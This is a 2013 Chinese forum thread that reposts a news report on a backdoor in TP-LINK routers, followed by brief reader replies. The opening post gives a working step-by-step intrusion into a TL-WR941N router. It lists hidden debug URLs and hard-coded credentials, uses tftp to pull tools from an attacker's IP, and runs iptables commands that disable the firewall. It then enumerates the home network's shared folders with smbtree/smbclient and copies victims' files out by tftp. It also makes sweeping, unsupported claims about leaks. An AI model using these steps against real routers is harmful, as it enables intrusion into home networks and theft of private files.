xinyesunke 发表于 2013-4-17 15:47

特大消息:TP-LINK多款路由器被曝存漏洞 或泄露QQ、网银密码

近期,“TP-LINK漏洞门”事件被CNVD( 国家信息安全漏洞共享平台)曝光后,在社会上引起了极大的关注。由于TP-LINK的市场占有率达到70%,很多网友担心自己的信息是否被泄露。据一位资深黑客介绍,TP-LINK路由器的后门漏洞危险程度远远大于目前披露的程度。他解释,在攻击漏洞的TP-LINK路由器时,并非一定要在本地连接路由器,而是可以通过远程进入TP-LINK路由器,从而监控网友的所有上网行为,并且能够窃取本地信息。也就是说,控制了用户的TP-LINK路由器之后,也就可以监控用户的上网行为,随意从网友的电脑里窃取一切信息,不管是隐私信息还是重要资料都可以信手拈来,而用户根本不知道。他做了一个演示,利用TP-LINK存在的后门漏洞,轻松的监控用户的上网行为,用户在QQ里面聊了什么,在淘宝上面买了什么东西,他都能够一目了然,在他的眼里看来,用户就是一个完全透明的人。而且,他还可以利用TP-LINK的漏洞进入用户的电脑,不管用户是在欧洲拍的婚纱照,还是在家里和爱人拍的隐私照,只要他想盗取随时都可以,完全没有隐私可言。他还介绍,TP-LINK的后门漏洞存在多年,一直都没有被TP-LINK重视,而TP-LINK的市场占有率达到70%以上。所以,很多隐私泄露都与TP-LINK有关,不然黑客怎么可能获得用户的隐私照片和银行账号,很多都是利用TP-LINK的漏洞完成的,只是用户根本不知道而已。国内用水星和迅捷的用户也难免厄运,因为水星和迅捷都是TP-LINK的马甲,只要能够找到TP-LINK路由器的漏洞,就能随意进入水星和迅捷路由器用户的电脑。就目前来说,TP-LINK的路由器大多存在问题,要想保证绝对安全几乎不大可能。以下是黑客利用TP-LINK路由器后门漏洞盗取用户信息的演示:  一、环境拓扑图 http://www.chinadaily.com.cn/hqcj/gjcj/201304/3446f08e66428d69c6f129d2fce537dc.jpg 图1 环境拓扑图拓扑图说明:1、PC2 使用公网IP,或者是连接公网的路由器下的DMZ设备 ;2、TP-Link开启远程WEB访问,示例中的8011为远程WEB访问端口 ;3、PC2要开启TFTP服务器 ;4、TP-Link设备型号:TL-WR941N,实物图请见附录 。二、操作步骤1、在TP-Link设备联网情况下开启远程WEB访问,如图2、图3http://www.chinadaily.com.cn/hqcj/gjcj/201304/e26eacb11c51ef0f1a36d80a993df59e.jpg 2、PC2设备在联网情况下,在地址栏输入 http:// xxx.xxx.xxx.xxx:8011 /userRpmNatDebugRpm26525557/start_art.html (xxx.xxx.xxx.xxx为TP-Link设备的WAN口IP,8011为远程WEB访问的端口号),等待1分钟左右出现如下页面,如图4所示http://www.chinadaily.com.cn/hqcj/gjcj/201304/79745513c33f3e7d172fc871ca55dc3d.jpg 图43、PC2在地址栏输入 http:// xxx.xxx.xxx.xxx:8011 /userRpmNatDebugRpm26525557/linux_cmdline.html ,出现TP-LINK设备的登录页面,输入设备管理的用户名和密码(用户名:admin,密码:admin),进入以下页面(如图5所示),这个页面需要的用户名是:osteam,密码是:5up。在这个页面我们就可以大展拳脚了。接下来我们就利用漏洞来访问TP-link局域网下的共享http://www.chinadaily.com.cn/hqcj/gjcj/201304/a99483b2d497f0f5f7f9032692c308bb.jpg 图54、PC2开启tftp服务器,并在tftp服务器路径下放置 busybox / libbigballofmud.so / smbclient / smbtree 文件(后面会将这几个文件通过tftp导入到TP-Link设备的/tmp目录下)。在设备页面的指令栏输入 tftp -g -r busybox aaa.aaa.aaa.aaa(aaa.aaa.aaa.aaa为PC2的公网IP地址)。出现如下页面(图6)http://www.chinadaily.com.cn/hqcj/gjcj/201304/1230451675686e5115625b3504f3d9d3.jpg 7、在指令栏输入 iptables -P INPUT ACCEPT / iptables -P FORWARD ACCEPT / iptables –F ,如图9。这几条命令是改变防火墙的过滤规则,操作后,该设备的防火墙就形同虚设了。http://www.chinadaily.com.cn/hqcj/gjcj/201304/6b89c43c3744b2b51e2cb71df0be62a0.jpg 10、在telnet窗口输入cd /tmp,进入该目录后先后输入 tftp -g -r libbigballofmud.so aaa.aaa.aaa.aaa/ tftp -g -r smbclient aaa.aaa.aaa.aaa/ tftp -g -r smbtree aaa.aaa.aaa.aaa(这几个命令是将libbigballofmud.so/smbtree/smbclient通过TFTP导入到TP-Link的/tmp目录下,所以要确保PC2开启TFTP服务器)。如图12所示,已成功导入 http://www.chinadaily.com.cn/hqcj/gjcj/201304/3987e76e52e4a00f55e384cd5a67affb.jpg 图1211、在telnet界面输入以下命令(如图13所示)mount tmpfs /usr -t tmpfs/tmp/busybox mkdir -p /usr/lib/tmp/busybox cp /tmp/*so* /usr/lib/ -fr/tmp/busybox ln -s /usr/lib/libbigballofmud.so /usr/lib/libbigballofmud.so.0chmod 777 smbtreechmod 777 smbclienthttp://www.chinadaily.com.cn/hqcj/gjcj/201304/fb99dfca367b5eba287c754941ec12cb.jpg 图1312、在/tmp目录下执行./smbtree命令,即可搜索到该局域网下的共享文件信息,图14http://www.chinadaily.com.cn/hqcj/gjcj/201304/06449d3407f79fc2579c8d92421fb863.jpg 图1413、执行./smbclient //bbbb/bbbbbb(//bbbb/bbbbbb为图14搜索到的一个共享文件目录),密码为空,进入文件夹后执行ls,显示该文件夹下的文件类容,如图15http://www.chinadaily.com.cn/hqcj/gjcj/201304/d908764233c175c188633713f4a91d8e.jpg 图1514、通过索引目录,可以查询到每一个目录下的文件信息,如/mnt/files/cherryblossoms1.jpg。如图16所示。接下来我们就看看cherryblossoms1.jpg是一个什么图片。http://www.chinadaily.com.cn/hqcj/gjcj/201304/b269a80e18083aaac6daab9c68c58e29.jpg 图1615、将共享文件拷贝到TP-Link设备上的/tmp目录下,执行命令get ccc(ccc为要拷贝的共享文件,如图17中的cherryblossoms1.jpg)http://www.chinadaily.com.cn/hqcj/gjcj/201304/7d99ac8285d01ba18b0110be71a7608b.jpg 图1716、将文件通过tftp拷贝到本地设备上,执行命令 /tmp/busybox tftp -p -l ccc aaa.aaa.aaa.aaa。如图18所示http://www.chinadaily.com.cn/hqcj/gjcj/201304/4a4c8fefe052d0225cc73e90b3bdbd71.jpg http://www.chinadaily.com.cn/hqcj/gjcj/201304/6eceafb97f4a68797482b37a3a4beb60.jpg 图20注意事项:1、TP-Link设备需要开启远程WEB访问,示例中的8011为远程WEB访问的端口2、本地设备最好使用公网IP,或者是连接公网的路由器下的DMZ设备3、本地设备要开启TFTP服务器4、 busybox / libbigballofmud.so / smbclient / smbtree 需要拷贝在TP-Link下的/tmp目录下5、示例中的xxx.xxx.xxx.xxx为TP-link设备WAN口IP,aaa.aaa.aaa.aaa为PC2的公网IP,/ /bbbb/bbbbbb为搜索到的一个共享目录,ccc为共享目录下的一个共享文件6、需要用到的工具有: tftpd32.exe 、 busybox 、 libbigballofmud.so 、 smbclient 、 smbtree附录: TL-WR941N 实物图 http://www.chinadaily.com.cn/hqcj/gjcj/201304/6dd6865456b01fed0143d43c2c3ad4df.jpg 图21http://www.chinadaily.com.cn/hqcj/gjcj/201304/de5242fe01b986121a410d0d90cdaf90.jpg

liudezong 发表于 2013-4-17 15:52

没共享文件还能看就厉害了

blackmetalzt 发表于 2013-4-17 15:58

学习了,,,,,,

tghk 发表于 2013-4-17 16:03

直接登录路由器,不用远程怎么进入路由器后台?

听の风雨 发表于 2013-4-17 16:07

貌似好强大,怎么看不懂

sssdwx228 发表于 2013-4-17 16:10

的确看到过类似报道,不过和TP...
感谢楼主总结与排版...:victory:

wjt3089 发表于 2013-4-17 16:27

文明CW,这个这个。。。

timss45 发表于 2013-4-17 16:28

:lol:lol:lol:lol:lol:lol:lol:lol:lol

xinyesunke 发表于 2013-4-17 16:34

tghk 发表于 2013-4-17 16:03 static/image/common/back.gif
直接登录路由器,不用远程怎么进入路由器后台?

百度新闻里的在百度新闻里直接搜 TPLINK

kkgs456 发表于 2013-4-17 16:35

口怕!!:funk:

xinyesunke 发表于 2013-4-17 16:35

听の风雨 发表于 2013-4-17 16:07 static/image/common/back.gif
貌似好强大,怎么看不懂

百度新闻里的在百度新闻里直接搜 TPLINK

ZPCFFF 发表于 2013-4-17 16:41

感谢楼主的分享
页: [1] 2 3 4
查看完整版本: 特大消息:TP-LINK多款路由器被曝存漏洞 或泄露QQ、网银密码